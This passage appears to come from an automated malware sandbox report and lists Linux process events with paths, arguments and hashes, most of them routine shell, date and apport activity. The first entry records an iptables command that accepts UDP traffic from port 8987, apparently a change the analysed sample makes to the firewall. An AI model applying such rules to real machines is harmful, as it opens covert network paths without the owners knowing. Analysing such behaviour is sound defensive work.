                                                                                                                  Path:/sbin/iptables
                                                                                                                  Arguments:iptables -I POSTROUTING -t nat -p udp --sport 8987 -j ACCEPT
                                                                                                                  File size:13 bytes
                                                                                                                  MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                  General

                                                                                                                  Start time:11:35:32
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/sbin/upstart
                                                                                                                  Arguments:n/a
                                                                                                                  File size:0 bytes
                                                                                                                  MD5 hash:00000000000000000000000000000000

                                                                                                                  General

                                                                                                                  Start time:11:35:32
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:/bin/sh -e /proc/self/fd/9
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:32
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:n/a
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:32
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/date
                                                                                                                  Arguments:date
                                                                                                                  File size:68464 bytes
                                                                                                                  MD5 hash:54903b613f9019bfca9f5d28a4fff34e

                                                                                                                  General

                                                                                                                  Start time:11:35:32
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:n/a
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:32
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/usr/share/apport/apport-checkreports
                                                                                                                  Arguments:/usr/bin/python3 /usr/share/apport/apport-checkreports --system
                                                                                                                  File size:1269 bytes
                                                                                                                  MD5 hash:1a7d84ebc34df04e55ca3723541f48c9

                                                                                                                  General

                                                                                                                  Start time:11:35:33
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/sbin/upstart
                                                                                                                  Arguments:n/a
                                                                                                                  File size:0 bytes
                                                                                                                  MD5 hash:00000000000000000000000000000000

                                                                                                                  General

                                                                                                                  Start time:11:35:33
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:/bin/sh -e /proc/self/fd/9
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:33
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:n/a
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:33
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/date
                                                                                                                  Arguments:date
                                                                                                                  File size:68464 bytes
                                                                                                                  MD5 hash:54903b613f9019bfca9f5d28a4fff34e

                                                                                                                  General

                                                                                                                  Start time:11:35:33
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:n/a
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:33
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/usr/share/apport/apport-gtk
                                                                                                                  Arguments:/usr/bin/python3 /usr/share/apport/apport-gtk
                                                                                                                  File size:23806 bytes
                                                                                                                  MD5 hash:ec58a49a30ef6a29406a204f28cc7d87

                                                                                                                  General

                                                                                                                  Start time:11:35:34
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/sbin/upstart
                                                                                                                  Arguments:n/a
                                                                                                                  File size:0 bytes
                                                                                                                  MD5 hash:00000000000000000000000000000000

                                                                                                                  General

                                                                                                                  Start time:11:35:34
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:/bin/sh -e /proc/self/fd/9
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:34
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:n/a
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:34
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/date
                                                                                                                  Arguments:date
                                                                                                                  File size:68464 bytes
                                                                                                                  MD5 hash:54903b613f9019bfca9f5d28a4fff34e

                                                                                                                  General

                                                                                                                  Start time:11:35:35
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:n/a
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:35
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/usr/share/apport/apport-gtk
                                                                                                                  Arguments:/usr/bin/python3 /usr/share/apport/apport-gtk
                                                                                                                  File size:23806 bytes
                                                                                                                  MD5 hash:ec58a49a30ef6a29406a204f28cc7d87